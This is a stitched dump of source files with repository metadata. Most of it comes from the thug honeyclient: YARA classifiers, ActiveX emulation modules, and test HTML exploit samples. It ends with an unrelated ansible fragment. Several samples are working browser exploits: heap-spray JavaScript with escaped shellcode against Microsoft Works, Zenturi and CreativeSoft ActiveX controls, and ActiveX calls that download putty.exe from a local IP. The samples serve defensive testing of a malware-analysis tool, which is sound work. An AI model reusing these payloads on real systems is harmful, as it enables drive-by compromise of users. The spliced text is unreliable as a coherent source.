ret = True
return ret
| 2,070
|
Python
|
.py
| 49
| 35.408163
| 86
| 0.661684
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,055
|
ImageClassifier.py
|
buffer_thug/thug/Classifier/ImageClassifier.py
|
#!/usr/bin/env python
#
# ImageClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class ImageClassifier(BaseClassifier):
default_rule_file = "rules/imageclassifier.yar"
default_filter_file = "rules/imagefilter.yar"
_classifier = "Image Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url, text):
for match in self.rules.match(data=text):
if (url, match) in self.matches:
continue
self.matches.append((url, match))
if self.discard_url_match(url, match):
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("image", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url, text)
def filter(self, url, text):
ret = False
for match in self.filters.match(data=text):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("imagefilter", url, rule, tags, meta)
ret = True
return ret
| 2,057
|
Python
|
.py
| 49
| 35.142857
| 86
| 0.662989
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,056
|
CookieClassifier.py
|
buffer_thug/thug/Classifier/CookieClassifier.py
|
#!/usr/bin/env python
#
# CookieClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class CookieClassifier(BaseClassifier):
default_rule_file = "rules/cookieclassifier.yar"
default_filter_file = "rules/cookiefilter.yar"
_classifier = "Cookie Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url, cookie):
for match in self.rules.match(data=cookie):
if (url, match) in self.matches:
continue
self.matches.append((url, match))
if self.discard_url_match(url, match): # pragma: no cover
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("cookie", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url, cookie)
def filter(self, url, cookie):
ret = False
for match in self.filters.match(data=cookie):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("cookiefilter", url, rule, tags, meta)
ret = True
return ret
| 2,094
|
Python
|
.py
| 49
| 35.897959
| 86
| 0.665682
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,057
|
JSClassifier.py
|
buffer_thug/thug/Classifier/JSClassifier.py
|
#!/usr/bin/env python
#
# JSClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class JSClassifier(BaseClassifier):
default_rule_file = "rules/jsclassifier.yar"
default_filter_file = "rules/jsfilter.yar"
_classifier = "JS Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url, script):
for match in self.rules.match(data=script):
self.matches.append((url, match))
if self.discard_url_match(url, match): # pragma: no cover
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("js", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url, script)
def filter(self, url, script):
ret = False
for match in self.filters.match(data=script):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("jsfilter", url, rule, tags, meta)
ret = True
return ret
| 1,996
|
Python
|
.py
| 47
| 35.978723
| 86
| 0.668217
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,058
|
BaseClassifier.py
|
buffer_thug/thug/Classifier/BaseClassifier.py
|
#!/usr/bin/env python
#
# BaseClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import os
import operator
import logging
from urllib.parse import urlparse
import yara
log = logging.getLogger("Thug")
class BaseClassifier:
def __init__(self):
self.matches = []
self.custom_classifiers = {}
self.init_rules()
self.init_filters()
@property
def classifier(self):
return getattr(self, "_classifier", "")
def init_rules(self):
self._rules = {}
self.rules_namespace_id = 1
p = getattr(self, "default_rule_file", None)
if p is None: # pragma: no cover
log.warning(
"[%s] Skipping not existing default classification rule file",
self.classifier,
)
return
r = os.path.join(log.configuration_path, p)
if not os.path.exists(r): # pragma: no cover
log.warning(
"[%s] Skipping not existing default classification rule file",
self.classifier,
)
return
self._rules["namespace0"] = r
self.rules = yara.compile(filepaths=self._rules)
def init_filters(self):
self._filters = {}
self.filters_namespace_id = 1
p = getattr(self, "default_filter_file", None)
if p is None: # pragma: no cover
log.warning(
"[%s] Skipping not existing default filter file", self.classifier
)
return
r = os.path.join(log.configuration_path, p)
if not os.path.exists(r): # pragma: no cover
log.warning(
"[%s] Skipping not existing default filter file", self.classifier
)
return
self._filters["namespace0"] = r
self.filters = yara.compile(filepaths=self._filters)
def add_rule(self, rule_file):
if not os.path.exists(rule_file):
log.warning(
"[%s] Skipping not existing classification rule file %s",
self.classifier,
rule_file,
)
return
self._rules[f"namespace{self.rules_namespace_id}"] = rule_file
self.rules_namespace_id += 1
self.rules = yara.compile(filepaths=self._rules)
def add_filter(self, filter_file):
if not os.path.exists(filter_file):
log.warning(
"[%s] Skipping not existing filter file %s",
self.classifier,
filter_file,
)
return
self._filters[f"namespace{self.filters_namespace_id}"] = filter_file
self.filters_namespace_id += 1
self.filters = yara.compile(filepaths=self._filters)
def discard_meta_domain_whitelist(self, url, values):
p_url = urlparse(url)
netloc = p_url.netloc.split(":")[
0
].lower() # Remove the port from netloc, if present
for value in values.split(","):
domain = value.lower().strip()
if not domain: # pragma: no cover
continue
prefix = "" if domain.startswith(".") else "."
if netloc in (domain,) or netloc.endswith(f"{prefix}{domain}"):
log.warning(
"[discard_meta_domain_whitelist] Whitelisted domain: %s (URL: %s)",
domain,
url,
)
return True
return False
def discard_url_match(self, url, match):
for key, values in match.meta.items():
m = getattr(self, f"discard_meta_{key}", None)
if m and m(url, values): # pylint:disable=not-callable
return True
return False
def add_customclassifier(self, method):
if not callable(method):
log.warning("Skipping non callable custom classifier %s", str(method))
return
get_function_code = operator.attrgetter("__code__")
method_name = get_function_code(method).co_name
self.custom_classifiers[method_name] = method.__get__(self)
def reset_customclassifiers(self):
self.custom_classifiers = {}
def reset_matches(self):
self.matches.clear()
def handle_match_etags(self, match):
etags = match.meta.get("etags", None)
if etags is None:
return
_etags = [t.strip() for t in etags.split(",")]
for s in match.strings:
if s.identifier not in _etags:
continue
for instance in s.instances:
data = instance.matched_data
tag = data.decode() if isinstance(data, bytes) else data
if tag not in match.tags:
match.tags.append(tag)
| 5,394
|
Python
|
.py
| 138
| 29.152174
| 87
| 0.58881
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,059
|
SampleClassifier.py
|
buffer_thug/thug/Classifier/SampleClassifier.py
|
#!/usr/bin/env python
#
# SampleClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# Original code written by Thorsten Sick <thorsten.sick@avira.com>
# from Avira (developed for the iTES Project http://ites-project.org)
#
# Modified by Angelo Dell'Aera:
# - Designed the more generic Classifier module and embedded this
# module into such module
# - Converted to YARA rules
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class SampleClassifier(BaseClassifier):
default_rule_file = "rules/sampleclassifier.yar"
default_filter_file = "rules/samplefilter.yar"
_classifier = "Sample Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, sample, md5):
for match in self.rules.match(data=sample):
self.matches.append((sample, match))
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("sample", md5, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](sample, md5)
def filter(self, sample, md5):
ret = False
for match in self.filters.match(data=sample):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("samplefilter", md5, rule, tags, meta)
ret = True
return ret
| 2,230
|
Python
|
.py
| 53
| 36.773585
| 86
| 0.691455
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,060
|
VBSClassifier.py
|
buffer_thug/thug/Classifier/VBSClassifier.py
|
#!/usr/bin/env python
#
# VBSClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class VBSClassifier(BaseClassifier):
default_rule_file = "rules/vbsclassifier.yar"
default_filter_file = "rules/vbsfilter.yar"
_classifier = "VBS Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url, script):
for match in self.rules.match(data=script):
self.matches.append((url, match))
if self.discard_url_match(url, match): # pragma: no cover
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("vbs", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url, script)
def filter(self, url, script):
ret = False
for match in self.filters.match(data=script):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("vbsfilter", url, rule, tags, meta)
ret = True
return ret
| 2,002
|
Python
|
.py
| 47
| 36.12766
| 86
| 0.669413
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,061
|
HTMLClassifier.py
|
buffer_thug/thug/Classifier/HTMLClassifier.py
|
#!/usr/bin/env python
#
# HTMLClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class HTMLClassifier(BaseClassifier):
default_rule_file = "rules/htmlclassifier.yar"
default_filter_file = "rules/htmlfilter.yar"
_classifier = "HTML Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url, html):
if log.HTMLInspector.check_ignore_handler(html):
return
for match in self.rules.match(data=html):
if (url, match) in self.matches:
continue
self.matches.append((url, match))
if self.discard_url_match(url, match): # pragma: no cover
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("html", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url, html)
def filter(self, url, html):
ret = False
for match in self.filters.match(data=html):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("htmlfilter", url, rule, tags, meta)
ret = True
return ret
| 2,147
|
Python
|
.py
| 51
| 35.078431
| 86
| 0.660259
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,062
|
URLClassifier.py
|
buffer_thug/thug/Classifier/URLClassifier.py
|
#!/usr/bin/env python
#
# URLClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# Original code written by Thorsten Sick <thorsten.sick@avira.com>
# from Avira (developed for the iTES Project http://ites-project.org)
#
# Modified by Angelo Dell'Aera:
# - Designed the more generic Classifier module and embedded this
# module into such module
# - Converted to YARA rules
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class URLClassifier(BaseClassifier):
default_rule_file = "rules/urlclassifier.yar"
default_filter_file = "rules/urlfilter.yar"
_classifier = "URL Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url):
if log.HTTPSession.is_data_uri(url):
return
for match in self.rules.match(data=url):
self.matches.append((url, match))
if self.discard_url_match(url, match):
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("url", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url)
def filter(self, url):
ret = False
for match in self.filters.match(data=url):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("urlfilter", url, rule, tags, meta)
ret = True
return ret
| 2,318
|
Python
|
.py
| 57
| 34.789474
| 86
| 0.676457
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,063
|
ZenturiProgramCheckerAttack3.htm
|
buffer_thug/tests/samples/exploits/ZenturiProgramCheckerAttack3.htm
|
<HTML>
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<SCRIPT>
boom.NavigateUrl("http://192.168.1.100/putty.exe");
</SCRIPT>
</BODY>
</HTML>
| 190
|
Python
|
.tac
| 8
| 21.75
| 82
| 0.701657
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,064
|
MicrosoftWorks7Attack.htm
|
buffer_thug/tests/samples/exploits/MicrosoftWorks7Attack.htm
|
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll Exploit</title>
Coded by lhoang8500
lhoang8500[at]gmail[dot]com
BKIS Center - Vietnam
<SCRIPT language="javascript">
var heapSprayToAddress = 0x0A0A0A0A;
var payLoadCode =
unescape("%u9090%u9090%u9090%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0A0A%u0A0A");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
<script language="JavaScript">
function payload() {
var num = 168430090;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>
| 1,600
|
Python
|
.tac
| 43
| 34.511628
| 446
| 0.772875
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,065
|
ZenturiProgramCheckerAttack2.htm
|
buffer_thug/tests/samples/exploits/ZenturiProgramCheckerAttack2.htm
|
<HTML>
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<SCRIPT>
boom.DownloadFile("http://192.168.1.100/putty.exe", "putty.exe");
</SCRIPT>
</BODY>
</HTML>
| 204
|
Python
|
.tac
| 8
| 23.5
| 82
| 0.697436
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,066
|
RediffBolDownloaderAttack.htm
|
buffer_thug/tests/samples/exploits/RediffBolDownloaderAttack.htm
|
<html>
<body>
<OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" >
</OBJECT>
<script language="javascript">
rboldwn.url = "file://C:/WINNT/Notepad.exe"
rboldwn.fontsize = 14
rboldwn.barcolor = 'EE4E00'
rboldwn.start = "start"
</script>
</body>
</html>
| 299
|
Python
|
.tac
| 12
| 23.583333
| 95
| 0.749117
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,067
|
ZenturiProgramCheckerAttack.htm
|
buffer_thug/tests/samples/exploits/ZenturiProgramCheckerAttack.htm
|
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<h4>Will Dormann from CERT/CC is credited with the discovery.</H4><br>
<h4>This exploits executes calc.exe</h4>
<SCRIPT>
var payLoadCode=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 2272;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.DebugMsgLog(x);
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
var heapBlockSize = 0x400000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (payLoadCode.length * 2);
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
</SCRIPT>
<input language=JavaScript onclick=Tryme() type=button value="Launch Exploit">
</BODY>
</HTML>
| 2,666
|
Python
|
.tac
| 54
| 38.333333
| 90
| 0.62158
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,068
|
CreativeSoftAttack.htm
|
buffer_thug/tests/samples/exploits/CreativeSoftAttack.htm
|
<html>
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>
<script language='javascript'>
var sc01 = unescape("%u9090%u9090"+
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");
var mainblk = unescape("%u0c0c%u0c0c");
var hdr = 20;
var slck = hdr + sc01.length;
while (mainblk.length < slck) mainblk += mainblk;
var fillblk = mainblk.substring(0,slck);
var blk = mainblk.substring(0,mainblk.length - slck);
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }
var buf = '';
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.
obj1.cachefolder = buf;
</script>
</html>
| 1,090
|
Python
|
.tac
| 25
| 42.48
| 84
| 0.728128
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,069
|
AolAttack.html
|
buffer_thug/tests/samples/exploits/AolAttack.html
|
<html>
<body>
<script>
var obj = document.createElement("object");
obj.setAttribute("classid", "clsid:189504B8-50D1-4AA8-B4D6-95C8F58A6414");
obj.LinkSBIcons();
</script>
</body>
</html>
| 190
|
Python
|
.tac
| 9
| 19.777778
| 75
| 0.740331
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,070
|
ZenturiProgramCheckerAttack.py
|
buffer_thug/thug/ActiveX/modules/ZenturiProgramCheckerAttack.py
|
import logging
log = logging.getLogger("Thug")
def DownloadFile(self, *arg):
log.ThugLogging.add_behavior_warn(
"[ZenturiProgramChecker ActiveX] Attack in DownloadFile function"
)
log.ThugLogging.add_behavior_warn(
f"[ZenturiProgramChecker ActiveX] Downloading from {arg[0]}"
)
log.ThugLogging.add_behavior_warn(
f"[ZenturiProgramChecker ActiveX] Saving downloaded file as: {arg[1]}"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"ZenturiProgramChecker ActiveX",
"DownloadFile function",
forward=False,
data={"url": arg[0], "filename": arg[1]},
)
try:
self._window._navigator.fetch(
arg[0], redirect_type="ZenturiProgramChecker Exploit"
)
except Exception: # pylint:disable=broad-except
log.ThugLogging.add_behavior_warn(
"[ZenturiProgramChecker ActiveX] Fetch failed"
)
def DebugMsgLog(self, *arg):
log.ThugLogging.add_behavior_warn(
"[ZenturiProgramChecker ActiveX] Attack in DebugMsgLog function"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"ZenturiProgramChecker ActiveX",
"Attack in DebugMsgLog function",
)
log.ThugLogging.Shellcode.check_shellcode(arg[0])
def NavigateUrl(self, *arg):
log.ThugLogging.add_behavior_warn(
"[ZenturiProgramChecker ActiveX] Attack in NavigateUrl function"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"ZenturiProgramChecker ActiveX",
"Attack in NavigateUrl function",
)
log.ThugLogging.Shellcode.check_shellcode(arg[0])
| 1,660
|
Python
|
.tac
| 47
| 28.510638
| 78
| 0.681421
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,071
|
RediffBolDownloaderAttack.py
|
buffer_thug/thug/ActiveX/modules/RediffBolDownloaderAttack.py
|
import logging
log = logging.getLogger("Thug")
def Seturl(self, val):
self.__dict__["url"] = val
log.ThugLogging.log_exploit_event(
self._window.url, "RediffBolDownloader ActiveX", "Overflow in url property"
)
log.ThugLogging.Shellcode.check_shellcode(val)
| 285
|
Python
|
.tac
| 8
| 31.125
| 83
| 0.714286
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,072
|
AOLAttack.py
|
buffer_thug/thug/ActiveX/modules/AOLAttack.py
|
import logging
log = logging.getLogger("Thug")
def LinkSBIcons(self):
log.ThugLogging.log_exploit_event(
self._window.url,
"AOL ActiveX",
"Attack in LinkSBIcons function",
cve="CVE-2006-5820",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2006-5820")
| 323
|
Python
|
.tac
| 10
| 26.5
| 83
| 0.676375
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,073
|
CreativeSoftAttack.py
|
buffer_thug/thug/ActiveX/modules/CreativeSoftAttack.py
|
import logging
log = logging.getLogger("Thug")
def Setcachefolder(self, val): # pylint:disable=unused-argument
log.ThugLogging.log_exploit_event(
self._window.url, "CreativeSoft ActiveX", "Overflow in cachefolder property"
)
| 245
|
Python
|
.tac
| 6
| 36.666667
| 84
| 0.75
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,074
|
MicrosoftWorks7Attack.py
|
buffer_thug/thug/ActiveX/modules/MicrosoftWorks7Attack.py
|
import logging
log = logging.getLogger("Thug")
def SetWksPictureInterface(self, val):
self.__dict__["WksPictureInterface"] = val
log.ThugLogging.log_exploit_event(
self._window.url,
"MicrosoftWorks7 ActiveX",
"Overflow in WksPictureInterface property",
)
| 295
|
Python
|
.tac
| 9
| 27.333333
| 51
| 0.705674
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,075
|
package-data.py
|
ansible_ansible/test/sanity/code-smell/package-data.py
|
"""Verify the contents of the built sdist and wheel."""
from __future__ import annotations
import contextlib
import fnmatch
import os
import pathlib
import re
import shutil
import subprocess
import sys
import tarfile
import tempfile
import typing as t
import zipfile
from ansible.release import __version__
